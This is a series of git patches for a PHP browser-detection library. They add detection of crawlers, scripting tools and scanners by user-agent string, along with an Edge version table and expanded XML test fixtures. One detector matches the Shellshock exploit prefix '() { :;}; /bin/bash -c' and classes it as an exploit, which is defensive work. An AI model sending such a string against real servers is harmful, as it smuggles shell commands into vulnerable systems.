(stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::NETCRAFT); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.netcraft.com/internet-data-mining/ssl-survey/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the curl library/cli tool. + * + * @return bool + */ + public static function checkRobotCurl() + { + if (stripos(self::$userAgentString, "curl/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::CURL); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://curl.haxx.se/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the python programming language. + * + * @return bool + */ + public static function checkRobotPython() + { + if (stripos(self::$userAgentString, "python-requests/") !== false || + stripos(self::$userAgentString, "python-urllib/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::PYTHON); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.python.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the GoLang programming language. + * + * @return bool + */ + public static function checkRobotGoLang() + { + if (stripos(self::$userAgentString, "Go-http-client") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GOLANG); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://golang.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the perl programming language. + * + * @return bool + */ + public static function checkRobotPerl() + { + if (stripos(self::$userAgentString, "libwww-perl/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::PERL); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.perl.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the wget tool. + * + * @return bool + */ + public static function checkRobotWget() + { + if (stripos(self::$userAgentString, "Wget/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::WGET); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://www.gnu.org/software/wget/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the zgrab TLS banner tool. + * + * @return bool + */ + public static function checkRobotZGrab() + { + if (stripos(self::$userAgentString, "zgrab/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::ZGRAB); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://github.com/zmap/zgrab"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Java programming language. + * + * @return bool + */ + public static function checkRobotJava() + { + if (stripos(self::$userAgentString, "Java/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::JAVA); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.java.com/en/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the ShellShock exploit. + * + * @return bool + */ + public static function checkRobotShellshock() + { + if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SHELLSHOCK); + self::$scriptedAgent->setType(ScriptedAgent::EXPLOIT); + self::$scriptedAgent->setInfoURL("https://blog.cloudflare.com/inside-shellshock/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the browsershots testing tool. + * + * @return bool + */ + public static function checkRobotBrowershots() + { + if (stripos(self::$userAgentString, "Browsershots") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BROWSERSHOTS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://browsershots.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the who.is spider. + * + * @return bool + */ + public static function checkRobotWhois() + { + if (stripos(self::$userAgentString, "who.is bot") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::WHOIS); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.who.is/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the MageReport exploit survey. + * + * @return bool + */ + public static function checkRobotMageReport() + { + if (stripos(self::$userAgentString, "MageReport") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::MAGEREPORT); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.magereport.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the AdBeat advertising survey. + * + * @return bool + */ + public static function checkRobotAdbeat() + { + if (stripos(self::$userAgentString, "adbeat.com") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::ADBEAT); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://www.adbeat.com/operation_policy"); + return true; + } + return false; + } + + /** + * Determine if the agent is the SocialRankIO crawler. + * + * @return bool + */ + public static function checkRobotSocialrank() + { + if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SOCIALRANK); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://socialrank.io/about"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Gluten Free crawler. + * + * @return bool + */ + public static function checkRobotGlutenFree() + { + if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GLUTENFREE); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://glutenfreepleasure.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Proximic spider. + * + * @return bool + */ + public static function checkRobotProximic() + { + if (stripos(self::$userAgentString, "proximic;") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::PROXIMIC); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.proximic.com/info/spider.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Ubermetrics survey. + * + * @return bool + */ + public static function checkRobotUbermetrics() + { + if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::UBERMETRICS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.ubermetrics-technologies.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Verisign ips-agent. + * + * @return bool + */ + public static function checkRobotVerisign() + { + if (stripos(self::$userAgentString, "ips-agent") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::VERISIGN); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://www.spambotsecurity.com/forum/viewtopic.php?f=7&t=1453"); + return true; + } + return false; + } +} \ No newline at end of file diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index d6628ec..0d91a2f 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -263,16 +263,5 @@ Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G360T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 - - wkhtmltopdf - unknown - Linux - unknown - unknown - unknown - - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf-amd64 Safari/534.34 - - From 8d6b754548629dc83a2556442f6c74800878417d Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Sat, 1 Apr 2017 20:18:53 +0100 Subject: [PATCH 02/19] Fix typo in README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 92e5ef5..0050a5d 100644 --- a/README.md +++ b/README.md @@ -74,7 +74,7 @@ use Sinergi\BrowserDetector\Browser; $browser = new Browser(); -//You can also provide a userAgent string if you don't wish to detec the current browser +//You can also provide a userAgent string if you don't wish to detect the current browser //$browser = new Browser("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"); if ($browser->getName() === Browser::IE && $browser->getVersion() < 11) { From 09eba0c6e73608471237e27e96a0f700badad29b Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Sat, 1 Apr 2017 20:24:10 +0100 Subject: [PATCH 03/19] Correct regular expression in Firefox and Seamonkey: Instead of: Match everything except ^ ;\), Match: a-z, A-Z, 0-9, and . only. Remove dirty fudge added to remove the stray \n Now passes tests without said fudge --- src/Browser.php | 3 +-- src/BrowserDetector.php | 4 ++-- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index 52b0f44..8963492 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -154,8 +154,7 @@ public function isBrowser($name) */ public function setVersion($version) { - //The regex for the Firefox version lets through a linebreak, causing the test to fail - $this->version = str_replace("\n","",(string)$version); + $this->version = (string)$version; return $this; } diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index d18be6f..7fef018 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -772,7 +772,7 @@ public static function checkBrowserNokia() public static function checkBrowserFirefox() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/Firefox[\\/ \\(]([^ ;\\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Firefox[\\/ \\(]([a-zA-Z\\d\\.]*)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -798,7 +798,7 @@ public static function checkBrowserFirefox() public static function checkBrowserSeaMonkey() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/SeaMonkey[\\/ \\(]([^ ;\\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/SeaMonkey[\\/ \\(]([a-zA-Z\\d\\.]*)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } From b19a9307b2264e808e6787e64d15e41931bc8d84 Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Thu, 6 Apr 2017 09:41:46 -0400 Subject: [PATCH 04/19] Added empty change log for version 7.0.0 --- CHANGELOG.md | 4 ++++ CONTRIBUTING.md | 1 - LICENSE | 2 +- 3 files changed, 5 insertions(+), 2 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index bb0199d..314c589 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,9 @@ # CHANGELOG +## 7.0.0 (released 2017-xx-xx) + +- ... + ## 6.1.2 (released 2016-12-28) - Added wkhtmltopdf detection diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 0ca2ed1..c80e864 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -10,7 +10,6 @@ Contributions are welcome, and are accepted via pull requests. Please review the * Send a coherent commit history, making sure each individual commit in your pull request is meaningful. If you had to make multiple intermediate commits while developing, please [squash](http://git-scm.com/book/en/Git-Tools-Rewriting-History) them before submitting. * You may also need to [rebase](http://git-scm.com/book/en/Git-Branching-Rebasing) to avoid merge conflicts. - ## Running Tests You will need an install of [Composer](https://getcomposer.org) before continuing. diff --git a/LICENSE b/LICENSE index dfe9a79..4be9f19 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ The MIT License (MIT) -Copyright (c) 2013-2017 Chris Schuld +Copyright (c) 2013-present Chris Schuld Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in From da79d833d64290a3996958492b2e0fc6cf12b90c Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Thu, 6 Apr 2017 09:46:51 -0400 Subject: [PATCH 05/19] Added boilerplate tests for srcipted agent --- .../Tests/ScriptedAgentDetectorTest.php | 13 +++++++++++++ tests/BrowserDetector/Tests/ScriptedAgentTest.php | 13 +++++++++++++ 2 files changed, 26 insertions(+) create mode 100644 tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php create mode 100644 tests/BrowserDetector/Tests/ScriptedAgentTest.php diff --git a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php new file mode 100644 index 0000000..6f015ff --- /dev/null +++ b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php @@ -0,0 +1,13 @@ +assertNotFalse(false); + } +} diff --git a/tests/BrowserDetector/Tests/ScriptedAgentTest.php b/tests/BrowserDetector/Tests/ScriptedAgentTest.php new file mode 100644 index 0000000..63999b9 --- /dev/null +++ b/tests/BrowserDetector/Tests/ScriptedAgentTest.php @@ -0,0 +1,13 @@ +assertNotFalse(false); + } +} From a3874b53237ccc809d249d6b6ca8d37079a5975e Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Thu, 6 Apr 2017 09:47:00 -0400 Subject: [PATCH 06/19] Fixed code style --- src/Browser.php | 3 --- src/ScriptedAgent.php | 8 -------- src/ScriptedAgentDetector.php | 2 +- 3 files changed, 1 insertion(+), 12 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index 8963492..3340f4c 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -2,9 +2,6 @@ namespace Sinergi\BrowserDetector; -/** - * Browser Detection. - */ class Browser { const UNKNOWN = 'unknown'; diff --git a/src/ScriptedAgent.php b/src/ScriptedAgent.php index 826a146..90aef4d 100644 --- a/src/ScriptedAgent.php +++ b/src/ScriptedAgent.php @@ -2,9 +2,6 @@ namespace Sinergi\BrowserDetector; -/** - * Browser Detection. - */ class ScriptedAgent { const UNKNOWN = 'unknown'; @@ -185,9 +182,4 @@ public function getUserAgent() { return $this->userAgent; } - - } - - -?> \ No newline at end of file diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php index c51cf84..2cd6d84 100644 --- a/src/ScriptedAgentDetector.php +++ b/src/ScriptedAgentDetector.php @@ -797,4 +797,4 @@ public static function checkRobotVerisign() } return false; } -} \ No newline at end of file +} From 235a2a859e77d97c68e67a41e3abff6a5a48b71f Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 15:06:48 +0100 Subject: [PATCH 07/19] Issue #77 - Detection from Microsoft Edge Version returns the HTML Version This adds a lookup table for Edge. This will require some maintenance. If the version cannot be resolved, the browser name "EdgeHTML" is returned rather than "Edge", so that the version number is not misleading. Also fixed regex for edge. --- src/Browser.php | 1 + src/BrowserDetector.php | 89 +++++++++++++++++-- .../Tests/_files/UserAgentStrings.xml | 4 +- 3 files changed, 87 insertions(+), 7 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index 3340f4c..e2e2e4c 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -38,6 +38,7 @@ class Browser const GSA = 'Google Search Appliance'; const YANDEX = 'Yandex'; const EDGE = 'Edge'; + const EDGE_HTML = 'EdgeHTML'; const DRAGON = 'Dragon'; const NSPLAYER = 'Windows Media Player'; const UCBROWSER = 'UC Browser'; diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index 7fef018..fb54500 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -71,6 +71,72 @@ class BrowserDetector implements DetectorInterface 'Mozilla', /* Mozilla is such an open standard that you must check it last */ ); + //https://en.wikipedia.org/wiki/Microsoft_Edge + protected static $edgeHTML = [ + "12.10049" => "0.10.10049", + "12.10051" => "0.11.10051", + "12.10052" => "0.11.10052", + "12.10061" => "0.11.10061", + "12.10074" => "0.11.10074", + "12.1008" => "0.11.10080", + "12.10122" => "13.10122", + "12.1013" => "15.1013", + "12.10136" => "16.10136", + "12.10149" => "19.10149", + "12.10158" => "20.10158", + "12.10159" => "20.10159", + "12.10162" => "20.10162", + "12.10166" => "20.10166", + "12.1024" => "20.1024", + "12.10512" => "20.10512", + "12.10514" => "20.10514", + "12.10525" => "20.10525", + "12.10532" => "20.10532", + "12.10536" => "20.10536", + "13.10547" => "21.10547", + "13.10549" => "21.10549", + "13.10565" => "23.10565", + "13.10572" => "25.10572", + "13.10576" => "25.10576", + "13.10581" => "25.10581", + "13.10586" => "25.10586", + "13.11082" => "25.11082", + "13.11099" => "27.11099", + "13.11102" => "28.11102", + "13.14251" => "28.14251", + "13.14257" => "28.14257", + "14.14267" => "31.14267", + "14.14271" => "31.14271", + "14.14279" => "31.14279", + "14.14283" => "31.14283", + "14.14291" => "34.14291", + "14.14295" => "34.14295", + "14.143" => "34.143", + "14.14316" => "37.14316", + "14.14322" => "37.14322", + "14.14327" => "37.14327", + "14.14328" => "37.14328", + "14.14332" => "37.14332", + "14.14342" => "38.14342", + "14.14352" => "38.14352", + "14.14393" => "38.14393", + "14.14901" => "39.14901", + "14.14905" => "39.14905", + "14.14915" => "39.14915", + "14.14926" => "39.14926", + "14.14931" => "39.14931", + "14.14936" => "39.14936", + "15.14942" => "39.14942", + "15.14946" => "39.14946", + "15.14951" => "39.14951", + "15.14955" => "39.14955", + "15.14959" => "39.14959", + "15.14965" => "39.14965", + "15.14971" => "39.14971", + "15.14977" => "39.14977", + "15.14986" => "39.14986" + ]; + /** * Routine to determine the browser type. * @@ -473,11 +539,24 @@ public static function checkBrowserVivaldi() public static function checkBrowserEdge() { if (stripos(self::$userAgentString, 'Edge') !== false) { - $version = explode('Edge/', self::$userAgentString); - if (isset($version[1])) { - self::$browser->setVersion((float)$version[1]); + preg_match('/Edge[\\/ \\(]([a-zA-Z\\d\\.]*)/i', self::$userAgentString, $matches); + if (sizeof($matches)>1) + { + if (isset(self::$edgeHTML[$matches[1]])) + { + self::$browser->setName(Browser::EDGE); + self::$browser->setVersion(self::$edgeHTML[$matches[1]]); + } + else + { + self::$browser->setName(Browser::EDGE_HTML); + self::$browser->setVersion($matches[1]); + } + } + else + { + self::$browser->setName(Browser::EDGE); } - self::$browser->setName(Browser::EDGE); return true; } @@ -962,7 +1041,7 @@ public static function checkBrowserYandex() return false; } - + /** * Determine if the browser is Comodo Dragon / Ice Dragon / Chromodo. * diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index 0d91a2f..89dca75 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -110,7 +110,7 @@ Edge - 12.10136 + 16.10136 Windows 10.0 unknown @@ -232,7 +232,7 @@ Edge - 14.14393 + 38.14393 Windows Phone 10 Lumia 640 LTE From 0f7bff3605eb2f6c602c8990050afea9d9397d31 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 15:09:36 +0100 Subject: [PATCH 08/19] Add unit test for EdgeHTML (Un-matched EdgeHTML version string) --- .../BrowserDetector/Tests/_files/UserAgentStrings.xml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index 89dca75..99d8945 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -241,6 +241,17 @@ Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 + + EdgeHTML + 12.00049 + Windows Phone + 10 + Lumia 640 LTE + unknown + + Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/12.00049 + + BlackBerry 7.1.0.523 From a88c162f85f746f859d34d136430a6572ecdb539 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 19:52:54 +0100 Subject: [PATCH 09/19] Add tests for the scripted agent detection --- .../Tests/ScriptedAgentDetectorTest.php | 10 +- .../Tests/ScriptedAgentTest.php | 6 +- .../Tests/_files/UserAgentStrings.xml | 737 +++++++++++++++++- .../Tests/_includes/UserAgentString.php | 46 ++ .../Tests/_includes/UserAgentStringMapper.php | 43 +- 5 files changed, 829 insertions(+), 13 deletions(-) diff --git a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php index 6f015ff..91a5d08 100644 --- a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php +++ b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php @@ -3,11 +3,17 @@ namespace Sinergi\BrowserDetector\Tests; use PHPUnit_Framework_TestCase; +use Sinergi\BrowserDetector\ScriptedAgent; class ScriptedAgentDetectorTest extends PHPUnit_Framework_TestCase { - public function testExample() + public function testDetect() { - $this->assertNotFalse(false); + $userAgentStringCollection = UserAgentStringMapper::map(); + foreach ($userAgentStringCollection as $userAgentString) { + $agent = new ScriptedAgent($userAgentString->getString()); + $this->assertSame($userAgentString->getScriptedAgent(), $agent->getName()); + $this->assertSame($userAgentString->getScriptedAgentType(), $agent->getType()); + } } } diff --git a/tests/BrowserDetector/Tests/ScriptedAgentTest.php b/tests/BrowserDetector/Tests/ScriptedAgentTest.php index 63999b9..fb03756 100644 --- a/tests/BrowserDetector/Tests/ScriptedAgentTest.php +++ b/tests/BrowserDetector/Tests/ScriptedAgentTest.php @@ -3,11 +3,13 @@ namespace Sinergi\BrowserDetector\Tests; use PHPUnit_Framework_TestCase; +use Sinergi\BrowserDetector\ScriptedAgent; class ScriptedAgentTest extends PHPUnit_Framework_TestCase { - public function testExample() + public function testDetect() { - $this->assertNotFalse(false); + $agent = new ScriptedAgent(); + $this->assertSame(ScriptedAgent::UNKNOWN, $agent->getName()); } } diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index 0d91a2f..a9b74c7 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -3,11 +3,13 @@ Opera - 21.0.1432.67 + 21.0.1432.67 OS X 10.9.3 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36 OPR/21.0.1432.67 @@ -20,6 +22,8 @@ 3.2 iPad unknown + unknown + unknown Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc @@ -32,6 +36,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 @@ -44,6 +50,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36 @@ -56,6 +64,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 YaBrowser/15.6.2311.3451 (beta) Yowser/2.0 Safari/537.36 @@ -68,6 +78,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) @@ -80,6 +92,8 @@ 10.10 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 @@ -91,6 +105,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) OPiOS/10.1.1.92212 Mobile/12B440 Safari/9537.53 @@ -103,6 +119,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/12B440 Safari/600.1.4 @@ -115,6 +133,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136 @@ -127,6 +147,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 @@ -138,6 +160,8 @@ 7 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Vivaldi/1.0.83.38 Safari/537.36 @@ -149,6 +173,8 @@ 47.0.2526.80 unknown unknown + unknown + unknown Mozilla/5.0 (X11; CrOS x86_64 7520.62.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 @@ -160,6 +186,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -171,6 +199,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -182,6 +212,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -193,6 +225,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -204,6 +238,8 @@ 8 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7 @@ -215,6 +251,8 @@ unknown unknown unknown + unknown + unknown Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5 @@ -226,6 +264,8 @@ 10.0.9.2372 unknown unknown + unknown + unknown Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.0.9.2372 Mobile Safari/537.10+ @@ -237,6 +277,8 @@ 10 Lumia 640 LTE unknown + unknown + unknown Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 @@ -248,6 +290,8 @@ 7.1.0.523 unknown unknown + unknown + unknown Mozilla/5.0 (BlackBerry; U; BlackBerry 9380; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.523 Mobile Safari/534.11+ @@ -259,9 +303,700 @@ 5.1.1 Samsung SM-G360T1 unknown + unknown + unknown Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G360T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 + + Safari + unknown + Linux + unknown + unknown + unknown + wkhtmltopdf + Tool + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf-amd64 Safari/534.34 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Baidu + Spider + + Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + Baiduspider+(+http://www.baidu.com/search/spider_jp.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + BaiDuSpider + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google + Spider + + Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot/2.1 (+http://www.google.com/bot.html) + + + + Chrome + 41.0.2272.96 + Android + 6.0.1 + unknown + unknown + Google + Spider + + ​Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-News + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Image/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Video/1.0 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mozilla/5.0 (compatible; Mediapartners-Google/2.1; 